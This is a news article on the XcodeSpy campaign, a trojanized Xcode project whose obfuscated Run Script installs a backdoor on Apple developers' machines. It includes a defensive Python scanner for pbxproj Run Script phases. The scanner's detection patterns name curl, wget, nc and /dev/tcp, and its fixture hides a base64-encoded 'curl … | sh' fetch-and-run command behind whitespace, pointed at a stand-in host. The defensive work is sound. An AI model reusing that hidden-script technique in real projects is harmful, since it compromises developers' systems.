Cybersecurity researchers on Thursday revealed a new attack in which threat actors are leveraging Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend of attacks aimed at developers and security researchers.
Dubbed “XcodeSpy,” the trojanized Xcode project is a tainted version of a legitimate open source project available on GitHub called TabBarInteraction that developers use to animate iOS tab bars based on user interaction.
“XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor on the developer’s macOS computer along with a persistence mechanism,” SentinelOne researchers said.
Xcode is Apple’s Integrated Development Environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.
Earlier this year, Google’s threat analysis group uncovered a North Korean campaign targeting security researchers and exploit developers, which involved sharing a Visual Studio project designed to load a malicious DLL on Windows systems.
The rigged Xcode project does something similar, only this time the attacks have targeted Apple developers.
In addition to including the original code, XcodeSpy also contains an obfuscated Run Script that runs when the developer's build target is launched. The script then contacts an attacker-controlled server to retrieve and install a custom variant of the EggShell backdoor on the development machine, which comes with capabilities to log information from the victim's microphone, camera, and keyboard.
“XcodeSpy takes advantage of a built-in feature of the Apple IDE that allows developers to run a custom shell script when launching an instance of their target application,” the researchers said. “While the technique is easy to identify if searched for, new or inexperienced developers who are unfamiliar with the Run Script feature are particularly at risk, as there is no prompt in the console or debugger to run the malicious script.”
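The point that the technique "is easy to identify if searched for" can be turned into a pre-build check: a project's Run Script phases live in its project.pbxproj as PBXShellScriptBuildPhase objects, and their shellScript values can be reviewed before anything is built. The Python below is an added example written for this article, not code from SentinelOne, from the TabBarInteraction project, or from XcodeSpy itself. It pulls each Run Script phase out of a pbxproj file, unescapes the script body, decodes any base64-looking literal and rescans the decoded text, and flags traits a reviewer would want to look at. The heuristic list, the 40-character leading-whitespace threshold (scripts padded far to the right are not visible in Xcode's Run Script pane), the object ids AB12CD34 and EF56AB78, and the embedded fixture (using a reserved .invalid domain) are all constructed assumptions of this example.

```python
import base64
import re

# Heuristics a reviewer would want flagged in a build-phase script. This list is
# an assumption of this example (generic obfuscation/dropper traits), not a set
# of published XcodeSpy indicators.
SUSPICIOUS = {
    "base64_decode": re.compile(r"\bbase64\b.*-[dD]\b"),
    "eval": re.compile(r"\beval\b"),
    "network_fetch": re.compile(r"\b(curl|wget|nc|ncat)\b|/dev/tcp/"),
    "script_interpreter": re.compile(r"\b(python3?|perl|ruby|osascript)\b.*\s-[ce]\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
}
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
PADDING_THRESHOLD = 40  # assumed: this much leading whitespace pushes a script out of view in Xcode

# project.pbxproj is an old-style plist: every object is `ID /* comment */ = { ... };`
# and a Run Script phase is an object whose isa is PBXShellScriptBuildPhase.
OBJECT = re.compile(r"(\w+) /\* (.*?) \*/ = \{(.*?)\};", re.S)
SHELL_SCRIPT = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')


def unescape(value):
    # Undo pbxproj string escaping: backslash-n, backslash-t, escaped quote, escaped backslash.
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), value)


def analyse_script(script):
    """Return the names of the heuristics that fire for one Run Script body."""
    findings = []
    if len(script) - len(script.lstrip(" \t")) >= PADDING_THRESHOLD:
        findings.append("whitespace_padding")
    # Decode any base64-looking literal and scan the decoded text as a second layer.
    layers = [script]
    for literal in B64_LITERAL.findall(script):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        layers.append(decoded)
        if "base64_literal" not in findings:
            findings.append("base64_literal")
    for layer in layers:
        for name, pattern in SUSPICIOUS.items():
            if name not in findings and pattern.search(layer):
                findings.append(name)
    return findings


def scan_pbxproj(text):
    """Map each PBXShellScriptBuildPhase object id to its findings ([] means nothing flagged)."""
    report = {}
    for match in OBJECT.finditer(text):
        obj_id, _comment, body = match.groups()
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        script_match = SHELL_SCRIPT.search(body)
        script = unescape(script_match.group(1)) if script_match else ""
        report[obj_id] = analyse_script(script)
    return report


# Constructed fixture: one ordinary Run Script phase and one that hides an
# encoded command behind 120 spaces. The decoded command points at a reserved
# .invalid host and exists only so the decoder stage has something to find.
_HIDDEN_CMD = b"curl -s http://c2.example.invalid/stage2 | sh"
_ENCODED = base64.b64encode(_HIDDEN_CMD).decode()
SAMPLE_PBXPROJ = (
    "/* Begin PBXShellScriptBuildPhase section */\n"
    "\t\tAB12CD34 /* Run Script */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    "\t\t\tfiles = (\n\t\t\t);\n"
    '\t\t\tname = "Run Script";\n'
    "\t\t\tshellPath = /bin/sh;\n"
    '\t\t\tshellScript = "echo \\"Building $PRODUCT_NAME\\"\\n";\n'
    "\t\t};\n"
    "\t\tEF56AB78 /* Run Script */ = {\n"
    "\t\t\tisa = PBXShellScriptBuildPhase;\n"
    '\t\t\tname = "Run Script";\n'
    "\t\t\tshellPath = /bin/sh;\n"
    '\t\t\tshellScript = "' + " " * 120 + 'eval \\"$(echo ' + _ENCODED + ' | base64 -d)\\"\\n";\n'
    "\t\t};\n"
    "/* End PBXShellScriptBuildPhase section */\n"
)

if __name__ == "__main__":
    for obj_id, findings in scan_pbxproj(SAMPLE_PBXPROJ).items():
        print(f"{obj_id}: {'SUSPICIOUS ' + ', '.join(findings) if findings else 'ok'}")
```

To run it against a real checkout, pass the contents of `YourProject.xcodeproj/project.pbxproj` to `scan_pbxproj` before opening the project in Xcode. The regex scan is deliberately simple; it does not parse nested objects, and a finding is a prompt to read the script, not a verdict.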
SentinelOne said it identified two variants of the EggShell payload, with samples uploaded to VirusTotal from Japan on August 5 and October 13 of last year. Additional clues point to an unnamed US organization said to have been targeted by this campaign between July and October 2020, and other developers in Asia are likely to have been targeted as well.
Adversaries have previously resorted to tainted Xcode executables (known as XcodeGhost) to inject malicious code into iOS applications compiled with the infected Xcode without the developers' knowledge, and subsequently used the infected applications to collect information from devices once the apps were downloaded and installed from the App Store.
Then in August 2020, Trend Micro researchers unearthed a similar threat that spread through modified Xcode projects, which, once built, were configured to install a macOS malware called XCSSET to steal credentials, capture screenshots, exfiltrate sensitive data from messaging and note-taking apps, and even encrypt files for a ransom.
XcodeSpy, on the other hand, takes a more direct path, as the goal appears to be to hit the developers themselves, although the ultimate objective behind the operation and the identity of the group behind it are still unclear.
“Targeting software developers is the first step in a successful supply chain attack. One way to do this is to abuse the development tools necessary to carry out this work,” the researchers said.
“It is quite possible that XcodeSpy was targeting a particular developer or group of developers, but there are other potential scenarios with such high-value victims. The attackers could simply be tracking interesting targets and gathering data for future campaigns, or they could be trying to collect Apple ID credentials for use in other campaigns using malware with valid Apple developer code signatures.”